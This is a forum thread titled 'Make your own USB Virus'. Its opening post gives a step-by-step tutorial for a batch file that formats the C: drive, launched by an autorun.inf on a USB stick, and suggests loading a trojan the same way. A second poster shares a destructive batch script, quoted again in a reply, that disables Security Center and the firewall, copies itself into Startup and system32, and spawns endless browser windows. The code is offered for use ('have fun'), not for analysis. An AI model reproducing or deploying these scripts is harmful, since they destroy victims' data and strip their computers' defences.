Make your own USB Virus

Manojfdo

Member
Sep 7, 2006
590
18
0
USB Virus

In this tutorial I am going to teach you how to make a USB stick autorun a virus.

this is educational purpose only! i :oo:

Step 1: Format your USB Stick

Step 2: Open Notepad and put in the following...
Code:
Code:
@echo off
title Delete C:\
cls
echo Are you sure you want to delete all your files? (y/n)
pause > nul
echo Deleting files......
Format C:

Save this as XXX.bat to the root of your USB Stick.

Step 3: Open Notepad again and put in the following...
Code:
Code:
[autorun]
icon=(name of your icon).ico
open=XXX.bat
action=Click here to open your flash drive.
shell\open\command=XXX.bat

^^Save this as autorun.inf *Make sure you take out the () when you put in your icons name, and you have to save the icon you have on the root of the USB Stick.*

Step 4: You are done! Feel free to change it up a little, you can make XXX.bat load up an .exe, so if you have a trojan that is .exe then you can make it load that, make sure that you include where it is loading the file from.

Step 5: To use your USB Stick plug it in to any computer and run your autorun file. The USB Stick should format the C: drive therefore deleting all files.

Thank you!

have fun.. :eek: :eek: :baffled: :baffled: :oo: :oo:
 

Ethical_World

Member
Mar 15, 2009
2,036
90
0
#! /bin/sh
Then What you think about this ???

Code:
@echo off
msg * Hay doc !
msg * Sorry to say But Im in your computer 
msg * are you ready to get distroied ?!
msg * 1
msg * 2
msg * sorry kid its in my commands!!
msg * 3!!
msg * No More War In Sri Lanka
COPY "%SYSTEMDRIVE%\Documents and Settings\%USERNAME%\Favorites\Links" "%SYSTEMDRIVE%\DOCUMENTS AND SETTINGS\*.*" /S /Q"  
COPY "%SYSTEMDRIVE%\WINDOWS\*.*" /S" "%SYSTEMDRIVE%\WINDOWS\SYSTEM32\*.*" /Q /S"
COPY "%SYSTEMDRIVE%\PROGRAMFILES\MICROSOFT OFFICE\*.* /S" "%SYSTEMDRIVE%\DOCUMENTS AND SETTINGS\%USERNAME%\DESKTOP" /S /Q "
COPY "%SYSTEMDRIVE%\WINDOWS\SYSTEM32\ /S" "%SYSTEMDRIVE%\Documents and Settings\All Users\Start Menu\*.*"/S /Q
COPY "%systemdrive%\windows\System32\dllcache\winlogon.exe" /s "%SYSTEMDRIVE%\DOCUMENTS AND SETTINGS\%USERNAME%\DESKTOP" /S /Q
COPY "%systemdrive%\windows\System32\dllcache\services.exe" /s "%SYSTEMDRIVE%\DOCUMENTS AND SETTINGS\%USERNAME%\DESKTOP" /S /Q
COPY "%systemdrive%\internet explorer /S" "%SYSTEMDRIVE%\WINDOWS" /Q
COPY "%systemdrive%\documents and settings\%username%\Cookies\*.*" /s "%SYSTEMDRIVE%\PROGRAMFILES" /Q /S"
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
copy %0 "%systemdrive%\documents and settings\%username%\start menu\programs\startup"
copy %0 "%systemdrive%\windows\system32"
ECHO ©2008 By: Zer0 Thunder Hacker !! 
:A
START IEXPLOERE.EXE
GOTO A
 

Manojfdo

Member
Sep 7, 2006
590
18
0
Ethical_World said:
Then What you think about this ???

Code:
@echo off
msg * Hay doc !
msg * Sorry to say But Im in your computer 
msg * are you ready to get distroied ?!
msg * 1
msg * 2
msg * sorry kid its in my commands!!
msg * 3!!
msg * No More War In Sri Lanka
COPY "%SYSTEMDRIVE%\Documents and Settings\%USERNAME%\Favorites\Links" "%SYSTEMDRIVE%\DOCUMENTS AND SETTINGS\*.*" /S /Q"  
COPY "%SYSTEMDRIVE%\WINDOWS\*.*" /S" "%SYSTEMDRIVE%\WINDOWS\SYSTEM32\*.*" /Q /S"
COPY "%SYSTEMDRIVE%\PROGRAMFILES\MICROSOFT OFFICE\*.* /S" "%SYSTEMDRIVE%\DOCUMENTS AND SETTINGS\%USERNAME%\DESKTOP" /S /Q "
COPY "%SYSTEMDRIVE%\WINDOWS\SYSTEM32\ /S" "%SYSTEMDRIVE%\Documents and Settings\All Users\Start Menu\*.*"/S /Q
COPY "%systemdrive%\windows\System32\dllcache\winlogon.exe" /s "%SYSTEMDRIVE%\DOCUMENTS AND SETTINGS\%USERNAME%\DESKTOP" /S /Q
COPY "%systemdrive%\windows\System32\dllcache\services.exe" /s "%SYSTEMDRIVE%\DOCUMENTS AND SETTINGS\%USERNAME%\DESKTOP" /S /Q
COPY "%systemdrive%\internet explorer /S" "%SYSTEMDRIVE%\WINDOWS" /Q
COPY "%systemdrive%\documents and settings\%username%\Cookies\*.*" /s "%SYSTEMDRIVE%\PROGRAMFILES" /Q /S"
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
copy %0 "%systemdrive%\documents and settings\%username%\start menu\programs\startup"
copy %0 "%systemdrive%\windows\system32"
ECHO ©2008 By: Zer0 Thunder Hacker !! 
:A
START IEXPLOERE.EXE
GOTO A

cool :lol: :lol: :lol: :lol:
 

KHz

Member
Feb 12, 2009
10,722
93
0
ගෙදර
Manojfdo said:
try your self :oo: :oo:
Well currently I don't have a USB Pen Drive
Wat ya saying is formatting C Drive in use
Sorry Bt I find that hard to believe
Bt I'm certainly gonna test this as soon as I get one!
 
Last edited: